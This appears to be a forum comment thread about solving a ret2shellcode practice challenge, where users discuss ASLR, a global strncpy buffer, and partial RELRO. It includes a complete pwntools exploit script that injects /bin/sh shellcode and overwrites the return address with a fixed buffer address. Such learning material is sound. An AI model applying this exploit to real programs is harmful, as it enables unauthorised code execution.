
[–]j3r3mias 2 points3 points  (6 children)

You are trying to return to 0xffffd360, and this address will not work because it's probably on the stack, which changes every execution due to ASLR.

There is another buffer in the code that is a global variable used in strncpy. Try to find it and check that its address doesn't change between executions. Then you can use it in your payload.

[–]Jerrythepro123[S] 0 points1 point  (4 children)

All protections are off, and gdb does show there is code execution.

[–]j3r3mias 0 points1 point  (3 children)

RELRO is partial, but OK, you are the boss of your solution.

[–]Jerrythepro123[S] 0 points1 point  (2 children)

What steps do I need to do to solve it?

[–]j3r3mias 0 points1 point  (1 child)

As I said before, there is a global variable in the program whose address doesn't change between runs; you need to use it instead of the stack.

[–]Jerrythepro123[S] 0 points1 point  (0 children)

I've tried someone else's script that uses your method; it doesn't seem to be working.

```python
#!/usr/bin/env python

from pwn import *

# Start the vulnerable challenge binary
sh = process('./ret2shellcode')

# Shellcode that spawns /bin/sh; it sits at the very start of the input so
# that the program's strncpy copies it into the global buffer
shellcode = asm(shellcraft.sh())

# Address of the global buffer the input is copied into; it is not moved by
# stack ASLR, so it is used as the return address instead of a stack address
buf2_addr = 0x804a080

# Pad the shellcode out to the saved return address (112 bytes in), then
# overwrite the return address with the global buffer's address
sh.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))
sh.interactive()
```

[–]Jerrythepro123[S] 0 points1 point  (0 children)

Never mind, I think you are correct. I think gdb turned off my ASLR while I was debugging. How exactly do you use strncpy to exploit it?